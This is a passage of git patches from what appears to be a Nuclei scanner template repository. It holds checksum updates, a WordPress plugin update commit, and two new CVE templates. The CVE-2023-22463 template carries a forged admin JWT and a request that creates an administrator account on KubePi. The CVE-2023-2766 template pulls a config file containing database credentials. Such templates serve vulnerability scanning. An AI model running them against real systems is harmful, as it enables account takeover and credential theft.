-http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7064,7 +7064,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:4c4c12df86c22b7da8a1a9e99790de7a5a131415 +templates-checksum.txt:d1363330eb619d738de57e1fe24b99d7c1dc77ae wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 82d46bb11d512f4fa9fa0add5b40106291c4ef3c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 13 Sep 2023 18:07:55 +0530 Subject: [PATCH 0342/1090] Create CVE-2023-2766.yaml --- http/cves/2023/CVE-2023-2766.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2766.yaml diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml new file mode 100644 index 0000000000..f52ea663bc --- /dev/null +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -0,0 +1,28 @@ +id: CVE-2023-2766 + +info: + name: OA E-Office jx2_config.ini - Information Leakage + author: DhiyaneshDK + severity: high + description: | + A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely. + reference: + - https://github.com/8079048q/cve/blob/main/weaveroa.md + metadata: + max-request: 1 + fofa-query: app="泛微-EOffice" + verified: true + tags: cve,cve2023,e-office,info-leak + +http: + - method: GET + path: + - "{{BaseURL}}/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header,"text/plain")' + - 'contains(body,"sdbuser") && contains(body, "sdbpassword")' + condition: and From db0ac300f538caf0cc931d55acfda300b9c99c94 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 13 Sep 2023 18:30:12 +0530 Subject: [PATCH 0343/1090] Create CVE-2023-22463.yaml --- http/cves/2023/CVE-2023-22463.yaml | 78 ++++++++++++++++++++++++++++++ 1 file changed, 78 insertions(+) create mode 100644 http/cves/2023/CVE-2023-22463.yaml diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml new file mode 100644 index 0000000000..42a14a55fd --- /dev/null +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -0,0 +1,78 @@ +id: CVE-2023-22463 + +info: + name: KubePi JwtSigKey - Login Bypass + author: DhiyaneshDK + severity: critical + description: | + KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code. + remediation: The vulnerability has been fixed in 1.6.3. In the patch, JWT key is specified in app.yml. If the user leaves it blank, a random key will be used. There are no workarounds aside from upgrading. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20JwtSigKey%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2023-22463.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-22463 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-22463 + cwe-id: CWE-798 + epss-score: 0.00065 + epss-percentile: 0.26993 + cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: fit2cloud + product: kubepi + shodan-query: html:"kubepi" + fofa-query: "kubepi" + tags: cve,cve2023,kubepi,k8s,auth-bypass + +variables: + name: "{{rand_base(6)}}" + password: "{{rand_base(8)}}" + email: "{{randstr}}@{{rand_base(5)}}.com" + nickname: "{{rand_base(4)}}" + token: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8" + +http: + - raw: + - | + POST /kubepi/api/v1/users HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/105.0.5195.127 Safari/537.36 + Accept: application/json + Accept-Encoding: gzip, deflate + Authorization: Bearer {{token}} + + { + "authenticate": { + "password": "{{password}}" + }, + "email": "{{email}}", + "isAdmin": true, + "mfa": { + "enable": false + }, + "name": "{{name}}", + "nickName": "{{nickname}}", + "roles": [ + ] + } + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"password":' + - '"isAdmin":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 From d829c670ba2474bbca2f771e4e563a58bb6bf428 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 14 Sep 2023 04:02:25 +0000 Subject: [PATCH 0344/1090] Auto WordPress Plugins Update [Thu Sep 14 04:02:25 UTC 2023] :robot: --- helpers/wordpress/plugins/akismet.txt | 2 +- helpers/wordpress/plugins/antispam-bee.txt | 2 +- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/code-snippets.txt | 2 +- helpers/wordpress/plugins/elementor.txt | 2 +- helpers/wordpress/plugins/force-regenerate-thumbnails.txt | 2 +- helpers/wordpress/plugins/forminator.txt | 2 +- helpers/wordpress/plugins/jetpack-boost.txt | 2 +- helpers/wordpress/plugins/nextgen-gallery.txt | 2 +- helpers/wordpress/plugins/redux-framework.txt | 2 +- helpers/wordpress/plugins/the-events-calendar.txt | 2 +- helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt | 2 +- helpers/wordpress/plugins/yith-woocommerce-wishlist.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 3 +-- .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - 